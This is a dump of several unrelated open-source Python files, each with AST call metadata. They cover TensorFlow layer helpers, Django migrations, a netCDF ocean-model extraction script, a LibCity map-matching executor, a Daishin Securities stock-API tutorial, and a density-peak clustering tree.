w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
weights = self._get_variable('weights', shape=wshape, init=w_init)
x = tf.nn.conv2d(x, weights, [1, stride, stride, 1], padding='SAME')
if bias:
bshape = [filters_out]
b_init = tf.zeros_initializer()
biases = self._get_variable('biases', shape=bshape, init=b_init)
x = x + biases
return x
def norm(self, x, type='BATCH', groups=32, training=False):
if type == 'BATCH':
# Perhaps use tf.nn.fused_batch_norm instead.
x = tf.layers.batch_normalization(x, fused=True, center=True, scale=True,
training=training, trainable=training,
momentum=0.997, epsilon=1e-5)
elif type == 'GROUP':
x = normalization_ops.group_norm(x, groups=groups, center=True, scale=True,
training=training, trainable=training,
channels_axis=-1, reduction_axes=[-3, -2])
return x
def fc(self, x, num_units_out):
num_units_in = x.get_shape()[1]
w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
b_init = tf.constant_initializer(0.0)
with self.namescope('fc'):
weights = self._get_variable('weights', shape=[num_units_in, num_units_out], init=w_init)
biases = self._get_variable('biases', shape=[num_units_out], init=b_init)
x = tf.nn.xw_plus_b(x, weights, biases)
return x
def reduce_mean(self, x, indices=(1, 2)):
x = tf.reduce_mean(x, reduction_indices=indices)
return x
def maxpool(self, x):
x = tf.nn.max_pool(
x,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding='SAME')
return x
def namescope(self, debug_string):
return tf.variable_scope(debug_string)
| [((17, 15, 17, 79), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((35, 15, 35, 28), 'tensorflow.compat.v1.nn.relu', 'tf.nn.relu', ({(35, 26, 35, 27): 'x'}, {}), '(x)', True, 'import tensorflow.compat.v1 as tf\n'), ((41, 17, 41, 68), 'tensorflow.contrib.layers.xavier_initializer', 'contrib.layers.xavier_initializer', (), '', True, 'import tensorflow.contrib as contrib\n'), ((43, 12, 43, 76), 'tensorflow.compat.v1.nn.conv2d', 'tf.nn.conv2d', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((65, 17, 65, 68), 'tensorflow.contrib.layers.xavier_initializer', 'contrib.layers.xavier_initializer', (), '', True, 'import tensorflow.contrib as contrib\n'), ((66, 17, 66, 45), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(66, 41, 66, 44): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((76, 12, 76, 56), 'tensorflow.compat.v1.reduce_mean', 'tf.reduce_mean', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((80, 12, 84, 27), 'tensorflow.compat.v1.nn.max_pool', 'tf.nn.max_pool', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((88, 15, 88, 46), 'tensorflow.compat.v1.variable_scope', 'tf.variable_scope', ({(88, 33, 88, 45): 'debug_string'}, {}), '(debug_string)', True, 'import tensorflow.compat.v1 as tf\n'), ((46, 21, 46, 43), 'tensorflow.compat.v1.zeros_initializer', 'tf.zeros_initializer', ({}, {}), '()', True, 'import tensorflow.compat.v1 as tf\n'), ((54, 16, 56, 75), 'tensorflow.compat.v1.layers.batch_normalization', 'tf.layers.batch_normalization', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((72, 16, 72, 51), 'tensorflow.compat.v1.nn.xw_plus_b', 'tf.nn.xw_plus_b', ({(72, 32, 72, 33): 'x', (72, 35, 72, 42): 'weights', (72, 44, 72, 50): 'biases'}, {}), '(x, weights, biases)', True, 'import tensorflow.compat.v1 as tf\n'), ((24, 27, 25, 75), 'tensorflow.compat.v1.strided_slice', 'tf.strided_slice', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((26, 27, 26, 88), 'tensorflow.compat.v1.pad', 'tf.pad', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((58, 16, 60, 87), 'tensorflow.python.ipu.normalization_ops.group_norm', 'normalization_ops.group_norm', (), '', False, 'from tensorflow.python.ipu import normalization_ops\n')] |
mareknowak98/AuctionPortal | backend/app/migrations/0021_auto_20201205_1846.py | 0059fec07d51c6942b8af73cb8c4f9962c21fc97 | # Generated by Django 3.1.4 on 2020-12-05 18:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0020_auto_20201204_2324'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='profileBankAccountNr',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='profile',
name='profileTelephoneNumber',
field=models.CharField(blank=True, max_length=15, null=True),
),
]
| [((16, 18, 16, 72), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((21, 18, 21, 72), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n')] |
bedaro/ssm-analysis | rawcdf_extract.py | 09880dbfa5733d6301b84accc8f42a5ee320d698 | #!/usr/bin/env python3
import time
import os
import tempfile
import shutil
import logging
from enum import Enum
from argparse import ArgumentParser, Namespace, FileType
from netCDF4 import Dataset, MFDataset
import geopandas as gpd
import numpy as np
domain_nodes_shp = "gis/ssm domain nodes.shp"
masked_nodes_txt = "gis/masked nodes.txt"
logger = logging.getLogger(__name__)
def get_node_ids(shps, masked):
merged = None
for i,shp in enumerate(shps):
df = gpd.read_file(shp)
df.set_index('node_id', inplace=True)
logger.debug("Shapefile {0} has {1} nodes".format(shp, len(df)))
if merged is None:
merged = df.index
else:
merged = merged.union(df.index)
logger.debug("get_node_ids found {0} nodes in {1} shapefiles".format(
len(merged), len(shps)))
masked_nodes = np.loadtxt(masked)
merged = merged.difference(masked_nodes)
logger.debug("{0} nodes left after masking".format(len(merged)))
return merged.to_numpy()
DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949,
-0.30326778, -0.40915567, -0.52520996, -0.65060186,
-0.78467834, -0.9269075 ]
def init_output(output_cdf, indata, nodes, **kwargs):
args = Namespace(**kwargs)
output = Dataset(output_cdf, "w")
timeDim = output.createDimension('time', len(indata.dimensions['time']))
nodeDim = output.createDimension('node', len(nodes))
nodeVar = output.createVariable('node', "i4", ('node',))
output['node'][:] = nodes
timeVar = output.createVariable('time', "f4", ('time',))
# Iterate over all output variables
# If an extraction attribute is "all":
# - add the 'siglay' dimension to the output if it's not already present
# - include the 'siglay' dimension on the output variable
# - add a 'zeta' output variable
for var, attr in args.input_vars:
if attr == InputAttr.ALL:
siglayers = indata['siglay'][:] if 'siglay' in indata.variables else DEFAULT_SIGLAYERS
output.createDimension('siglay', len(siglayers))
output.createVariable('siglay', 'f4', ('siglay',))
output['siglay'][:] = siglayers
if 'zeta' in indata.variables:
output.createVariable('zeta', 'f4', ('time','node'))
break
return output
def append_output(output_cdf):
return Dataset(output_cdf, 'a')
def init_output_vars(output, **kwargs):
args = Namespace(**kwargs)
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.BOTTOM:
out_name += "_bottom"
# TODO handle photic case
dims = ('time','siglay','node') if attr == InputAttr.ALL else ('time','node')
output.createVariable(out_name, 'f4', dims)
# Gotten from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i+n]
class InputAttr(Enum):
ALL = 0
BOTTOM = 1
# TODO add "photic" for the photic zone
attr_strings = {
"all": InputAttr.ALL,
"bottom": InputAttr.BOTTOM
}
# Expands an input variable argument into a variable name and an attribute
# describing the vertical extraction method.
def colon_meta(string):
var, attr = string.split(':', 2)
return (var, attr_strings[attr])
def main():
script_home = os.path.dirname(os.path.realpath(__file__))
parser = ArgumentParser(description="Extract data from SSM netcdf output files")
parser.add_argument("incdf", nargs="+", help="each input CDF file")
parser.add_argument("outcdf",
help="the output CDF file (created if it doesn't exist)")
parser.add_argument("outprefix",
help="a prefix for the extracted variables in the output CDF")
parser.add_argument("-d", dest="domain_node_shapefiles", action="append",
help="Specify a domain node shapefile")
parser.add_argument("-m", dest="masked_nodes_file", type=FileType('r'),
help="Specify a different masked nodes text file")
parser.add_argument("--invar", dest="input_vars", type=colon_meta,
action="append",
help="Extract the values of a different output variable")
parser.add_argument("-v", "--verbose", action="store_true", dest="verbose",
help="Print progress messages during the extraction")
parser.add_argument("-c", "--chunk-size", type=int, dest="chunk_size",
help="Process this many CDF files at once")
parser.add_argument("--cache", dest="cache", action="store_true",
help="Use a read/write cache in a temporary directory")
# Cannot include default values of lists here, see
# https://bugs.python.org/issue16399
parser.set_defaults(chunk_size=4, verbose=False,
masked_nodes_file=os.path.join(script_home, masked_nodes_txt))
args = parser.parse_args()
# This is the workaround
if not args.input_vars:
args.input_vars = [("DOXG",InputAttr.BOTTOM)]
if not args.domain_node_shapefiles:
args.domain_node_shapefiles = [os.path.join(script_home, domain_nodes_shp)]
logging.basicConfig(level=logging.INFO if args.verbose else logging.WARNING)
#logger.setLevel(logging.DEBUG)
if args.cache:
with tempfile.TemporaryDirectory() as tmpdir:
exist_cdfs = []
logger.info("Caching input files...")
for infile in args.incdf:
newpath = os.path.join(tmpdir, os.path.basename(infile))
shutil.copy(infile, newpath)
exist_cdfs.append(newpath)
output_cdf = os.path.join(tmpdir, os.path.basename(args.outcdf))
if os.path.exists(args.outcdf):
logger.info("Caching output file...")
shutil.copy(args.outcdf, output_cdf)
do_extract(exist_cdfs, output_cdf, **vars(args))
# Copy the resulting output CDF back
logger.info("Saving output file...")
shutil.copy(output_cdf, args.outcdf)
logger.info("Finished.")
else:
do_extract(args.incdf, args.outcdf, **vars(args))
def do_extract(exist_cdfs, output_cdf, **kwargs):
args = Namespace(**kwargs)
logger.info("Determining scope of work...")
indata = MFDataset(exist_cdfs) if len(exist_cdfs) > 1 else Dataset(exist_cdfs[0])
node_ids = get_node_ids(args.domain_node_shapefiles, args.masked_nodes_file)
logger.info("Initializing output file...")
if not os.path.exists(output_cdf):
outdata = init_output(output_cdf, indata, node_ids, **vars(args))
outdata['time'][:] = indata['time'][:] / 3600 / 24
else:
outdata = append_output(output_cdf)
init_output_vars(outdata, **vars(args))
# Attempts to use the entire MFDataset don't seem to scale well.
# Instead, I'm resorting to a blocking approach where MFDatasets are
# created for only a few netCDF files at a time
indata.close()
i = 0
total = 0
logger.info("Beginning extraction...")
start_time = time.perf_counter()
times_ct = outdata.dimensions['time'].size
for cdfchunk in chunks(exist_cdfs, args.chunk_size):
c = MFDataset(cdfchunk) if len(cdfchunk) > 1 else Dataset(cdfchunk[0])
chunk_times = len(c.dimensions['time'])
data = copy_data(c, outdata, i, node_ids, **vars(args))
i += chunk_times
c.close()
elapsed = (time.perf_counter() - start_time)
to_go = elapsed * (times_ct / i - 1)
total += np.sum([d.size * d.itemsize for k,d in data.items()])
logger.info("{0}/{1} ({2}s elapsed, {3}s to go, {4}KBps)".format(i,
times_ct, int(elapsed), int(to_go), int(total/elapsed/1000)))
logger.info("Extraction finished.")
outdata.close()
def copy_data(cdfin, cdfout, timeidx, node_ids, **kwargs):
args = Namespace(**kwargs)
times_ct = len(cdfin.dimensions['time'])
alldata = {}
# Copy zeta if it's needed
if 'zeta' in cdfout.variables:
alldata['zeta'] = cdfin['zeta'][:, node_ids - 1]
cdfout['zeta'][timeidx:timeidx + times_ct, :] = alldata['zeta']
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.ALL:
slc = slice(None)
elif attr == InputAttr.BOTTOM:
slc = -1
out_name += "_bottom"
# TODO add "photic" case which will look rather different
data = cdfin[var][:, slc, node_ids - 1]
logger.debug("data is shape " + str(data.shape))
if attr == InputAttr.ALL:
cdfout[out_name][timeidx:timeidx+times_ct,:,:] = data
else:
cdfout[out_name][timeidx:timeidx+times_ct,:] = data
alldata[out_name] = data
return alldata
if __name__ == "__main__": main()
| [((17, 9, 17, 36), 'logging.getLogger', 'logging.getLogger', ({(17, 27, 17, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((32, 19, 32, 37), 'numpy.loadtxt', 'np.loadtxt', ({(32, 30, 32, 36): 'masked'}, {}), '(masked)', True, 'import numpy as np\n'), ((43, 11, 43, 30), 'argparse.Namespace', 'Namespace', ({}, {}), '(**kwargs)', False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((44, 13, 44, 37), 'netCDF4.Dataset', 'Dataset', ({(44, 21, 44, 31): 'output_cdf', (44, 33, 44, 36): '"""w"""'}, {}), "(output_cdf, 'w')", False, 'from netCDF4 import Dataset, MFDataset\n'), ((68, 11, 68, 35), 'netCDF4.Dataset', 'Dataset', ({(68, 19, 68, 29): 'output_cdf', (68, 31, 68, 34): '"""a"""'}, {}), "(output_cdf, 'a')", False, 'from netCDF4 import Dataset, MFDataset\n'), ((71, 11, 71, 30), 'argparse.Namespace', 'Namespace', ({}, {}), '(**kwargs)', False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((104, 13, 104, 84), 'argparse.ArgumentParser', 'ArgumentParser', (), '', False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((134, 4, 134, 80), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((158, 11, 158, 30), 'argparse.Namespace', 'Namespace', ({}, {}), '(**kwargs)', False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((177, 17, 177, 36), 'time.perf_counter', 'time.perf_counter', ({}, {}), '()', False, 'import time\n'), ((196, 11, 196, 30), 'argparse.Namespace', 'Namespace', ({}, {}), '(**kwargs)', False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((22, 13, 22, 31), 'geopandas.read_file', 'gpd.read_file', ({(22, 27, 22, 30): 'shp'}, {}), '(shp)', True, 'import geopandas as gpd\n'), ((103, 34, 103, 60), 'os.path.realpath', 'os.path.realpath', ({(103, 51, 103, 59): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((160, 13, 160, 34), 'netCDF4.MFDataset', 'MFDataset', ({(160, 23, 160, 33): 'exist_cdfs'}, {}), '(exist_cdfs)', False, 'from netCDF4 import Dataset, MFDataset\n'), ((160, 63, 160, 85), 'netCDF4.Dataset', 'Dataset', ({(160, 71, 160, 84): 'exist_cdfs[0]'}, {}), '(exist_cdfs[0])', False, 'from netCDF4 import Dataset, MFDataset\n'), ((163, 11, 163, 37), 'os.path.exists', 'os.path.exists', ({(163, 26, 163, 36): 'output_cdf'}, {}), '(output_cdf)', False, 'import os\n'), ((112, 61, 112, 74), 'argparse.FileType', 'FileType', ({(112, 70, 112, 73): '"""r"""'}, {}), "('r')", False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((126, 30, 126, 73), 'os.path.join', 'os.path.join', ({(126, 43, 126, 54): 'script_home', (126, 56, 126, 72): 'masked_nodes_txt'}, {}), '(script_home, masked_nodes_txt)', False, 'import os\n'), ((132, 39, 132, 82), 'os.path.join', 'os.path.join', ({(132, 52, 132, 63): 'script_home', (132, 65, 132, 81): 'domain_nodes_shp'}, {}), '(script_home, domain_nodes_shp)', False, 'import os\n'), ((138, 13, 138, 42), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ({}, {}), '()', False, 'import tempfile\n'), ((146, 15, 146, 42), 'os.path.exists', 'os.path.exists', ({(146, 30, 146, 41): 'args.outcdf'}, {}), '(args.outcdf)', False, 'import os\n'), ((152, 12, 152, 48), 'shutil.copy', 'shutil.copy', ({(152, 24, 152, 34): 'output_cdf', (152, 36, 152, 47): 'args.outcdf'}, {}), '(output_cdf, args.outcdf)', False, 'import shutil\n'), ((180, 12, 180, 31), 'netCDF4.MFDataset', 'MFDataset', ({(180, 22, 180, 30): 'cdfchunk'}, {}), '(cdfchunk)', False, 'from netCDF4 import Dataset, MFDataset\n'), ((180, 58, 180, 78), 'netCDF4.Dataset', 'Dataset', ({(180, 66, 180, 77): 'cdfchunk[0]'}, {}), '(cdfchunk[0])', False, 'from netCDF4 import Dataset, MFDataset\n'), ((187, 19, 187, 38), 'time.perf_counter', 'time.perf_counter', ({}, {}), '()', False, 'import time\n'), ((143, 16, 143, 44), 'shutil.copy', 'shutil.copy', ({(143, 28, 143, 34): 'infile', (143, 36, 143, 43): 'newpath'}, {}), '(infile, newpath)', False, 'import shutil\n'), ((145, 46, 145, 75), 'os.path.basename', 'os.path.basename', ({(145, 63, 145, 74): 'args.outcdf'}, {}), '(args.outcdf)', False, 'import os\n'), ((148, 16, 148, 52), 'shutil.copy', 'shutil.copy', ({(148, 28, 148, 39): 'args.outcdf', (148, 41, 148, 51): 'output_cdf'}, {}), '(args.outcdf, output_cdf)', False, 'import shutil\n'), ((142, 47, 142, 71), 'os.path.basename', 'os.path.basename', ({(142, 64, 142, 70): 'infile'}, {}), '(infile)', False, 'import os\n')] |
nadiaaaaachen/Bigscity-LibCity | libcity/executor/map_matching_executor.py | d8efd38fcc238e3ba518c559cc9f65b49efaaf71 | from logging import getLogger
from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor
from libcity.utils import get_evaluator
class MapMatchingExecutor(AbstractTraditionExecutor):
def __init__(self, config, model):
self.model = model
self.config = config
self.evaluator = get_evaluator(config)
self.evaluate_res_dir = './libcity/cache/evaluate_cache'
self._logger = getLogger()
def evaluate(self, test_data):
"""
use model to test data
Args:
test_data
"""
result = self.model.run(test_data)
batch = {'route': test_data['route'], 'result': result, 'rd_nwk': test_data['rd_nwk']}
self.evaluator.collect(batch)
self.evaluator.save_result(self.evaluate_res_dir)
def train(self, train_dataloader, eval_dataloader):
"""
对于传统模型,不需要训练
Args:
train_dataloader(torch.Dataloader): Dataloader
eval_dataloader(torch.Dataloader): Dataloader
"""
pass # do nothing
| [((11, 25, 11, 46), 'libcity.utils.get_evaluator', 'get_evaluator', ({(11, 39, 11, 45): 'config'}, {}), '(config)', False, 'from libcity.utils import get_evaluator\n'), ((13, 23, 13, 34), 'logging.getLogger', 'getLogger', ({}, {}), '()', False, 'from logging import getLogger\n')] |
sujeethiremath/Project-1 | project1/budget/migrations/0005_delete_hiddenstatus_budget.py | 7f0bff66287d479e231e123615f2df18f9107178 | # Generated by Django 2.2.5 on 2020-04-08 00:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('budget', '0004_auto_20200407_2356'),
]
operations = [
migrations.DeleteModel(
name='HiddenStatus_Budget',
),
]
| [((13, 8, 15, 9), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', (), '', False, 'from django.db import migrations\n')] |
mssung94/daishin-trading-system | tutorial/43.py | d6682495afb7a08e68db65537b1d1789f2996891 | # 대신증권 API
# 데이터 요청 방법 2가지 BlockRequest 와 Request 방식 비교 예제
# 플러스 API 에서 데이터를 요청하는 방법은 크게 2가지가 있습니다
#
# BlockRequest 방식 - 가장 간단하게 데이터 요청해서 수신 가능
# Request 호출 후 Received 이벤트로 수신 받기
#
# 아래는 위 2가지를 비교할 수 있도록 만든 예제 코드입니다
# 일반적인 데이터 요청에는 BlockRequest 방식이 가장 간단합니다
# 다만, BlockRequest 함수 내에서도 동일 하게 메시지펌핑을 하고 있어 해당 통신이 마치기 전에 실시간 시세를 수신 받거나
# 다른 이벤트에 의해 재귀 호출 되는 문제가 있을 경우 함수 호출이 실패할 수 있습니다
# 복잡한 실시간 시세 수신 중에 통신을 해야 하는 경우에는 Request 방식을 이용해야 합니다.
import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event
g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')
StopEvent = win32event.CreateEvent(None, 0, 0, None)
class CpEvent:
def set_params(self, client, name, caller):
self.client = client # CP 실시간 통신 object
self.name = name # 서비스가 다른 이벤트를 구분하기 위한 이름
self.caller = caller # callback 을 위해 보관
def OnReceived(self):
# 실시간 처리 - 현재가 주문 체결
if self.name == 'stockmst':
print('recieved')
win32event.SetEvent(StopEvent)
return
class CpCurReply:
def __init__(self, objEvent):
self.name = "stockmst"
self.obj = objEvent
def Subscribe(self):
handler = win32com.client.WithEvents(self.obj, CpEvent)
handler.set_params(self.obj, self.name, None)
def MessagePump(timeout):
waitables = [StopEvent]
while 1:
rc = win32event.MsgWaitForMultipleObjects(
waitables,
0, # Wait for all = false, so it waits for anyone
timeout, # (or win32event.INFINITE)
win32event.QS_ALLEVENTS) # Accepts all input
if rc == win32event.WAIT_OBJECT_0:
# Our first event listed, the StopEvent, was triggered, so we must exit
print('stop event')
break
elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
# A windows message is waiting - take care of it. (Don't ask me
# why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
# This message-serving MUST be done for COM, DDE, and other
# Windowsy things to work properly!
print('pump')
if pythoncom.PumpWaitingMessages():
break # we received a wm_quit message
elif rc == win32event.WAIT_TIMEOUT:
print('timeout')
return
pass
else:
print('exception')
raise RuntimeError("unexpected win32wait return value")
code = 'A005930'
##############################################################
# 1. BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('BlockRequest 로 수신 받은 데이터')
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11) # 종가
item['대비'] = objStockMst.GetHeaderValue(12) # 전일대비
print(item)
print('')
##############################################################
# 2. Request ==> 메시지 펌프 ==> OnReceived 이벤트 수신
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()
code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11) # 종가
item['대비'] = objStockMst.GetHeaderValue(12) # 전일대비
print(item)
| [((23, 12, 23, 52), 'win32event.CreateEvent', 'win32event.CreateEvent', ({(23, 35, 23, 39): 'None', (23, 41, 23, 42): '0', (23, 44, 23, 45): '0', (23, 47, 23, 51): 'None'}, {}), '(None, 0, 0, None)', False, 'import win32event\n'), ((53, 13, 57, 36), 'win32event.MsgWaitForMultipleObjects', 'win32event.MsgWaitForMultipleObjects', ({(54, 12, 54, 21): 'waitables', (55, 12, 55, 13): '0', (56, 12, 56, 19): 'timeout', (57, 12, 57, 35): 'win32event.QS_ALLEVENTS'}, {}), '(waitables, 0, timeout, win32event.\n QS_ALLEVENTS)', False, 'import win32event\n'), ((36, 12, 36, 42), 'win32event.SetEvent', 'win32event.SetEvent', ({(36, 32, 36, 41): 'StopEvent'}, {}), '(StopEvent)', False, 'import win32event\n'), ((70, 15, 70, 46), 'pythoncom.PumpWaitingMessages', 'pythoncom.PumpWaitingMessages', ({}, {}), '()', False, 'import pythoncom\n')] |
SuilandCoder/ADPTC_LIB | ADPTC_LIB/DPTree_ST.py | ef5c2b7fcf117c8c90a3841489471289ecbf4562 | #%%
import numpy as np
import copy
import matplotlib.pyplot as plt
import time
def split_cluster_new(tree,local_density,dc_eps,closest_denser_nodes_id,mixin_near_matrix):
'''
dc_eps: density_connectivity 阈值
使用父子节点的直接距离,与子节点与兄弟节点的连通距离进行聚簇划分;
使用平均密度划分outlier
返回:
outlier_forest
cluster_forest
'''
mean_density = np.mean(local_density)
outlier_forest = {}
cluster_forest = {}
uncertain_forest = {}
not_direct_reach = []
#* 计算不可直接可达的点:
for k in range(len(closest_denser_nodes_id)):
near_nodes = mixin_near_matrix[k]
if closest_denser_nodes_id[k] not in near_nodes:
not_direct_reach.append(k)
pass
not_direct_reach = np.array(not_direct_reach)
# not_direct_reach = np.where(closest_dis_denser>eps)[0]
#* 将不直接距离可达的点按层次排列:
# not_direct_reach = np.array(not_direct_reach)
depth_list_not_direct_reach= np.zeros(len(not_direct_reach),dtype=np.int16)
for i in range(len(not_direct_reach)):
# depth_list_not_direct_reach[i] = tree.node_dir[not_direct_reach[i]].getLvl()
depth_list_not_direct_reach[i] = tree.calcu_depth(not_direct_reach[i],0)
pass
not_direct_reach = list(not_direct_reach[np.argsort(depth_list_not_direct_reach)])
#* 模拟栈结构,层次深的先处理
start = time.clock()
while(len(not_direct_reach)>0):
#* 判断是否 连通:距离小于阈值,并且密度要大于子树的平均密度
node_id = not_direct_reach.pop()
if(node_id==129193 or node_id==61589 or node_id == 123593):
print(node_id)
if node_id in tree.sorted_gamma_index[0:10]:
cluster_forest[node_id] = tree.remove_subtree(node_id)
continue
node = tree.node_dir[node_id]
parent_id = node.parent_id
parent_node = tree.node_dir[parent_id]
children = parent_node.getChildren()
siblings_reliable = [ i for i in children if i not in not_direct_reach] #* 求得兄弟节点,其中兄弟节点不能是不直接可达的点
not_reliable_nodes = [i for i in children if i not in siblings_reliable]
if node_id in not_reliable_nodes:
not_reliable_nodes.remove(node_id)
if node_id in siblings_reliable:
siblings_reliable.remove(node_id)
pairs_nodes = is_connected_new(tree,local_density,dc_eps,node_id,siblings_reliable,not_reliable_nodes,mixin_near_matrix)
if len(pairs_nodes)==0:
if(node_id==tree.root_node.node_id):
continue
if(local_density[node_id]-mean_density*dc_eps)>=0:
#* 获取子节点个数:
offspring_id = tree.get_subtree_offspring_id(node_id,[node_id])
if(len(offspring_id)<local_density[node_id]):
uncertain_forest[node_id] = tree.remove_subtree(node_id)
pass
else:
cluster_forest[node_id] = tree.remove_subtree(node_id)
pass
pass
else:
outlier_forest[node_id] = tree.remove_subtree(node_id)
pass
pass
pass
end = time.clock()
print('切割树耗时 %s' % str(end - start))
cluster_forest[tree.root_node.node_id] = tree #* 添加根节点的树
return outlier_forest, cluster_forest, uncertain_forest
def is_connected_new(tree,local_density,dc_eps,cur_node_id,reliable_nodes,not_reliable_nodes,mixin_near_matrix):
'''
cur_node: 当前待判断与父节点连通度的点;
reliable_nodes:兄弟节点中与父节点直接相连的点;
not_reliable_nodes:兄弟节点中不与父节点直接相连的点,但可能间接相连;
连通度判断方案:
1. 判断 cur_node 与 reliable_nodes 是否可达,是则返回;没有则执行2;
2. 判断 cur_node 与 not_reliable_nodes(假设为[a,b,c,d,e]) 是否可达,若与[a,b,c]可达,与[d,e]不可达,执行3;
3. 循环遍历[a,b,c],递归调用本方法 is_connected_entropy(……,cur_node_id=[a],reliable_nodes,not_reliable_nodes=[b,c,d,e])
'''
#* 1.
if(len(reliable_nodes)==0):
return []
for reliable_node_id in reliable_nodes:
pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,reliable_node_id,mixin_near_matrix)
if(len(pairs_nodes)==0):
continue
# return pairs_nodes
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
pass
#* 2.
for i in range(len(not_reliable_nodes)):
pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,not_reliable_nodes[i],mixin_near_matrix)
if(len(pairs_nodes)==0):
pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
if(len(pairs_nodes)>0):
return pairs_nodes
else:
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
# return pairs_nodes
# #* 连通点平均密度大于局部密度阈值,则更新最大相似度
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
if(len(pairs_nodes)==0):
pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
if(len(pairs_nodes)>0):
return pairs_nodes
# pass
return []
def label_these_node_new(outlier_forest,cluster_forest,node_num,uncertain_forest,mixin_near_matrix):
'''
给森林中的样本点贴标签
考虑不确定点的分配
'''
labels = np.full((node_num),-1,dtype=np.int32)
for outlier_id in outlier_forest:
outlier_tree = outlier_forest[outlier_id]
outlier_idlist = outlier_tree.get_subtree_offspring_id(outlier_id,[outlier_id])
labels[outlier_idlist] = -1
pass
label = 0
for tree_id in cluster_forest:
cluster_tree = cluster_forest[tree_id]
cluster_idlist = cluster_tree.get_subtree_offspring_id(tree_id,[tree_id])
labels[cluster_idlist] = label
label = label + 1
pass
#todo 修改此处代码
for uncertain_tree_id in uncertain_forest:
uncertain_tree = uncertain_forest[uncertain_tree_id]
uncertain_nodes_id = uncertain_tree.get_subtree_offspring_id(uncertain_tree_id,[uncertain_tree_id])
all_near_nodes = np.array([],dtype=np.int32)
for node_id in uncertain_nodes_id:
all_near_nodes = np.append(all_near_nodes,mixin_near_matrix[node_id])
pass
# all_near_nodes = mixin_near_matrix[uncertain_nodes_id]
all_near_nodes = np.unique(all_near_nodes)
all_near_nodes = all_near_nodes[np.where(labels[all_near_nodes]!=-1)]
unique_labels,counts=np.unique(labels[all_near_nodes],return_counts=True)
if(len(counts)==0):
cur_label = -1
else:
cur_label = unique_labels[np.argmax(counts)]
labels[uncertain_nodes_id]=cur_label
pass
core_points = cluster_forest.keys()
return labels,core_points
'''
密度峰值树;
根据cfsfdp算法生成的局部密度、高密度最近邻距离、决策指标来生成 DPTree;
'''
class Node():
def __init__(self,node_id,attr_list,parent_id=None,dist_to_parent=None,density=None,gamma=None,children=[]):
self.node_id = node_id
self.attr_list = attr_list
self.parent_id = parent_id
self.dist_to_parent = dist_to_parent
self.density = density
self.children = children
self.gamma = gamma
self.offspring_num = None
self.lvl = None
def addChild(self,child):
self.children+=[child]
